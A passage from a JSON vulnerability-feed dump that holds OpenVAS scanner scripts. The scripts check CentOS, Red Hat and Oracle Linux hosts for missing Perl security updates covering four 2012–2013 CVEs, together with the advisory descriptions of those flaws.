isrpmvuln(pkg:\"perl-Module-Build\", rpm:\"perl-Module-Build~0.3500~130.el6_4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-Module-CoreList\", rpm:\"perl-Module-CoreList~2.18~130.el6_4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-Module-Load\", rpm:\"perl-Module-Load~0.16~130.el6_4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-Module-Load-Conditional\", rpm:\"perl-Module-Load-Conditional~0.30~130.el6_4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-Module-Loaded\", rpm:\"perl-Module-Loaded~0.02~130.el6_4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-Module-Pluggable\", rpm:\"perl-Module-Pluggable~3.90~130.el6_4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-Object-Accessor\", rpm:\"perl-Object-Accessor~0.34~130.el6_4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-Package-Constants\", rpm:\"perl-Package-Constants~0.02~130.el6_4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-Params-Check\", rpm:\"perl-Params-Check~0.26~130.el6_4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-parent\", rpm:\"perl-parent~0.221~130.el6_4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-Parse-CPAN-Meta\", rpm:\"perl-Parse-CPAN-Meta~1.40~130.el6_4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-Pod-Escapes\", rpm:\"perl-Pod-Escapes~1.04~130.el6_4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-Pod-Simple\", rpm:\"perl-Pod-Simple~3.13~130.el6_4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-suidperl\", rpm:\"perl-suidperl~5.10.1~130.el6_4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-Term-UI\", rpm:\"perl-Term-UI~0.20~130.el6_4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-Test-Harness\", rpm:\"perl-Test-Harness~3.17~130.el6_4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-Test-Simple\", rpm:\"perl-Test-Simple~0.92~130.el6_4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-Time-HiRes\", rpm:\"perl-Time-HiRes~1.9721~130.el6_4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-Time-Piece\", rpm:\"perl-Time-Piece~1.15~130.el6_4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-version\", rpm:\"perl-version~0.77~130.el6_4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-27T10:51:33", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-5195", "CVE-2013-1667", "CVE-2012-5526", "CVE-2012-6329"], "description": "Check for the Version of perl", "modified": "2017-07-12T00:00:00", "published": "2013-03-28T00:00:00", "id": "OPENVAS:870972", "href": "http://plugins.openvas.org/nasl.php?oid=870972", "type": "openvas", "title": "RedHat Update for perl RHSA-2013:0685-01", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for perl RHSA-2013:0685-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Perl is a high-level programming language commonly used for system\n administration utilities and web programming.\n\n A heap overflow flaw was found in Perl. If a Perl application allowed\n user input to control the count argument of the string repeat operator, an\n attacker could cause the application to crash or, potentially, execute\n arbitrary code with the privileges of the user running the application.\n (CVE-2012-5195)\n\n A denial of service flaw was found in the way Perl's rehashing code\n implementation, responsible for recalculation of hash keys and\n redistribution of hash content, handled certain input. If an attacker\n supplied specially-crafted input to be used as hash keys by a Perl\n application, it could cause excessive memory consumption. (CVE-2013-1667)\n\n It was found that the Perl CGI module, used to handle Common Gateway\n Interface requests and responses, incorrectly sanitized the values for\n Set-Cookie and P3P headers. If a Perl application using the CGI module\n reused cookies values and accepted untrusted input from web browsers, a\n remote attacker could use this flaw to alter member items of the cookie or\n add new items. (CVE-2012-5526)\n\n It was found that the Perl Locale::Maketext module, used to localize Perl\n applications, did not properly handle backslashes or fully-qualified method\n names. An attacker could possibly use this flaw to execute arbitrary Perl\n code with the privileges of a Perl application that uses untrusted\n Locale::Maketext templates. (CVE-2012-6329)\n\n Red Hat would like to thank the Perl project for reporting CVE-2012-5195\n and CVE-2013-1667. Upstream acknowledges Tim Brown as the original\n reporter of CVE-2012-5195 and Yves Orton as the original reporter of\n CVE-2013-1667.\n\n All Perl users should upgrade to these updated packages, which contain\n backported patches to correct these issues. All running Perl programs\n must be restarted for this update to take effect.\";\n\n\ntag_affected = \"perl on Red Hat Enterprise Linux (v. 5 server),\n Red Hat Enterprise Linux Desktop (v. 6),\n Red Hat Enterprise Linux Server (v. 6),\n Red Hat Enterprise Linux Workstation (v. 6)\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://www.redhat.com/archives/rhsa-announce/2013-March/msg00070.html\");\n script_id(870972);\n script_version(\"$Revision: 6687 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-12 11:46:43 +0200 (Wed, 12 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2013-03-28 09:48:52 +0530 (Thu, 28 Mar 2013)\");\n script_cve_id(\"CVE-2012-5195\", \"CVE-2012-5526\", \"CVE-2012-6329\", \"CVE-2013-1667\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_xref(name: \"RHSA\", value: \"2013:0685-01\");\n script_name(\"RedHat Update for perl RHSA-2013:0685-01\");\n\n script_summary(\"Check for the Version of perl\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"RHENT_6\")\n{\n\n if ((res = isrpmvuln(pkg:\"perl\", rpm:\"perl~5.10.1~130.el6_4\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-Archive-Extract\", rpm:\"perl-Archive-Extract~0.38~130.el6_4\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-Archive-Tar\", rpm:\"perl-Archive-Tar~1.58~130.el6_4\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-CGI\", rpm:\"perl-CGI~3.51~130.el6_4\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-CPAN\", rpm:\"perl-CPAN~1.9402~130.el6_4\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-CPANPLUS\", rpm:\"perl-CPANPLUS~0.88~130.el6_4\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-Compress-Raw-Bzip2\", rpm:\"perl-Compress-Raw-Bzip2~2.020~130.el6_4\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-Compress-Raw-Zlib\", rpm:\"perl-Compress-Raw-Zlib~2.020~130.el6_4\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-Compress-Zlib\", rpm:\"perl-Compress-Zlib~2.020~130.el6_4\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-Digest-SHA\", rpm:\"perl-Digest-SHA~5.47~130.el6_4\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-ExtUtils-CBuilder\", rpm:\"perl-ExtUtils-CBuilder~0.27~130.el6_4\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-ExtUtils-Embed\", rpm:\"perl-ExtUtils-Embed~1.28~130.el6_4\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-ExtUtils-MakeMaker\", rpm:\"perl-ExtUtils-MakeMaker~6.55~130.el6_4\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-ExtUtils-ParseXS\", rpm:\"perl-ExtUtils-ParseXS~2.2003.0~130.el6_4\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-File-Fetch\", rpm:\"perl-File-Fetch~0.26~130.el6_4\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-IO-Compress-Base\", rpm:\"perl-IO-Compress-Base~2.020~130.el6_4\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-IO-Compress-Bzip2\", rpm:\"perl-IO-Compress-Bzip2~2.020~130.el6_4\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-IO-Compress-Zlib\", rpm:\"perl-IO-Compress-Zlib~2.020~130.el6_4\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-IO-Zlib\", rpm:\"perl-IO-Zlib~1.09~130.el6_4\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-IPC-Cmd\", rpm:\"perl-IPC-Cmd~0.56~130.el6_4\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-Locale-Maketext-Simple\", rpm:\"perl-Locale-Maketext-Simple~0.18~130.el6_4\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-Log-Message\", rpm:\"perl-Log-Message~0.02~130.el6_4\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-Log-Message-Simple\", rpm:\"perl-Log-Message-Simple~0.04~130.el6_4\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-Module-Build\", rpm:\"perl-Module-Build~0.3500~130.el6_4\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-Module-CoreList\", rpm:\"perl-Module-CoreList~2.18~130.el6_4\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-Module-Load\", rpm:\"perl-Module-Load~0.16~130.el6_4\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-Module-Load-Conditional\", rpm:\"perl-Module-Load-Conditional~0.30~130.el6_4\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-Module-Loaded\", rpm:\"perl-Module-Loaded~0.02~130.el6_4\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-Module-Pluggable\", rpm:\"perl-Module-Pluggable~3.90~130.el6_4\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-Object-Accessor\", rpm:\"perl-Object-Accessor~0.34~130.el6_4\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-Package-Constants\", rpm:\"perl-Package-Constants~0.02~130.el6_4\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-Params-Check\", rpm:\"perl-Params-Check~0.26~130.el6_4\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-Parse-CPAN-Meta\", rpm:\"perl-Parse-CPAN-Meta~1.40~130.el6_4\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-Pod-Escapes\", rpm:\"perl-Pod-Escapes~1.04~130.el6_4\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-Pod-Simple\", rpm:\"perl-Pod-Simple~3.13~130.el6_4\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-Term-UI\", rpm:\"perl-Term-UI~0.20~130.el6_4\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-Test-Harness\", rpm:\"perl-Test-Harness~3.17~130.el6_4\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-Test-Simple\", rpm:\"perl-Test-Simple~0.92~130.el6_4\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-Time-HiRes\", rpm:\"perl-Time-HiRes~1.9721~130.el6_4\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-Time-Piece\", rpm:\"perl-Time-Piece~1.15~130.el6_4\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-core\", rpm:\"perl-core~5.10.1~130.el6_4\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-debuginfo\", rpm:\"perl-debuginfo~5.10.1~130.el6_4\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-devel\", rpm:\"perl-devel~5.10.1~130.el6_4\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-libs\", rpm:\"perl-libs~5.10.1~130.el6_4\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-parent\", rpm:\"perl-parent~0.221~130.el6_4\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-suidperl\", rpm:\"perl-suidperl~5.10.1~130.el6_4\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-version\", rpm:\"perl-version~0.77~130.el6_4\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"RHENT_5\")\n{\n\n if ((res = isrpmvuln(pkg:\"perl\", rpm:\"perl~5.8.8~40.el5_9\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-debuginfo\", rpm:\"perl-debuginfo~5.8.8~40.el5_9\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-suidperl\", rpm:\"perl-suidperl~5.8.8~40.el5_9\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-05-29T18:38:23", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-5195", "CVE-2013-1667", "CVE-2012-5526", "CVE-2012-6329"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2013-03-28T00:00:00", "id": "OPENVAS:1361412562310881700", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310881700", "type": "openvas", "title": "CentOS Update for perl CESA-2013:0685 centos5", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for perl CESA-2013:0685 centos5\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2013-March/019668.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.881700\");\n script_version(\"$Revision: 14222 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 13:50:48 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2013-03-28 09:49:47 +0530 (Thu, 28 Mar 2013)\");\n script_cve_id(\"CVE-2012-5195\", \"CVE-2012-5526\", \"CVE-2012-6329\", \"CVE-2013-1667\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_xref(name:\"CESA\", value:\"2013:0685\");\n script_name(\"CentOS Update for perl CESA-2013:0685 centos5\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'perl'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS5\");\n script_tag(name:\"affected\", value:\"perl on CentOS 5\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_tag(name:\"insight\", value:\"Perl is a high-level programming language commonly used for system\n administration utilities and web programming.\n\n A heap overflow flaw was found in Perl. If a Perl application allowed\n user input to control the count argument of the string repeat operator, an\n attacker could cause the application to crash or, potentially, execute\n arbitrary code with the privileges of the user running the application.\n (CVE-2012-5195)\n\n A denial of service flaw was found in the way Perl's rehashing code\n implementation, responsible for recalculation of hash keys and\n redistribution of hash content, handled certain input. If an attacker\n supplied specially-crafted input to be used as hash keys by a Perl\n application, it could cause excessive memory consumption. (CVE-2013-1667)\n\n It was found that the Perl CGI module, used to handle Common Gateway\n Interface requests and responses, incorrectly sanitized the values for\n Set-Cookie and P3P headers. If a Perl application using the CGI module\n reused cookies values and accepted untrusted input from web browsers, a\n remote attacker could use this flaw to alter member items of the cookie or\n add new items. (CVE-2012-5526)\n\n It was found that the Perl Locale::Maketext module, used to localize Perl\n applications, did not properly handle backslashes or fully-qualified method\n names. An attacker could possibly use this flaw to execute arbitrary Perl\n code with the privileges of a Perl application that uses untrusted\n Locale::Maketext templates. (CVE-2012-6329)\n\n Red Hat would like to thank the Perl project for reporting CVE-2012-5195\n and CVE-2013-1667. Upstream acknowledges Tim Brown as the original\n reporter of CVE-2012-5195 and Yves Orton as the original reporter of\n CVE-2013-1667.\n\n All Perl users should upgrade to these updated packages, which contain\n backported patches to correct these issues. All running Perl programs\n must be restarted for this update to take effect.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS5\")\n{\n\n if ((res = isrpmvuln(pkg:\"perl\", rpm:\"perl~5.8.8~40.el5_9\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-suidperl\", rpm:\"perl-suidperl~5.8.8~40.el5_9\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:36:32", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-5195", "CVE-2013-1667", "CVE-2012-5526", "CVE-2012-6329"], "description": "Oracle Linux Local Security Checks ELSA-2013-0685", "modified": "2018-09-28T00:00:00", "published": "2015-10-06T00:00:00", "id": "OPENVAS:1361412562310123654", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310123654", "type": "openvas", "title": "Oracle Linux Local Check: ELSA-2013-0685", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2013-0685.nasl 11688 2018-09-28 13:36:28Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.123654\");\n script_version(\"$Revision: 11688 $\");\n script_tag(name:\"creation_date\", value:\"2015-10-06 14:06:50 +0300 (Tue, 06 Oct 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 15:36:28 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2013-0685\");\n script_tag(name:\"insight\", value:\"ELSA-2013-0685 - perl security update. Please see the references for more insight.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2013-0685\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2013-0685.html\");\n script_cve_id(\"CVE-2012-5195\", \"CVE-2012-5526\", \"CVE-2012-6329\", \"CVE-2013-1667\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux(5|6)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux5\")\n{\n if ((res = isrpmvuln(pkg:\"perl\", rpm:\"perl~5.8.8~40.el5_9\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"perl-suidperl\", rpm:\"perl-suidperl~5.8.8~40.el5_9\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif(release == \"OracleLinux6\")\n{\n if ((res = isrpmvuln(pkg:\"perl\", rpm:\"perl~5.10.1~130.el6_4\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"perl-Archive-Extract\", rpm:\"perl-Archive-Extract~0.38~130.el6_4\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"perl-Archive-Tar\", rpm:\"perl-Archive-Tar~1.58~130.el6_4\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"perl-CGI\", rpm:\"perl-CGI~3.51~130.el6_4\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"perl-CPAN\", rpm:\"perl-CPAN~1.9402~130.el6_4\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"perl-CPANPLUS\", rpm:\"perl-CPANPLUS~0.88~130.el6_4\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"perl-Compress-Raw-Bzip2\", rpm:\"perl-Compress-Raw-Bzip2~2.020~130.el6_4\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"perl-Compress-Raw-Zlib\", rpm:\"perl-Compress-Raw-Zlib~2.020~130.el6_4\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"perl-Compress-Zlib\", rpm:\"perl-Compress-Zlib~2.020~130.el6_4\", 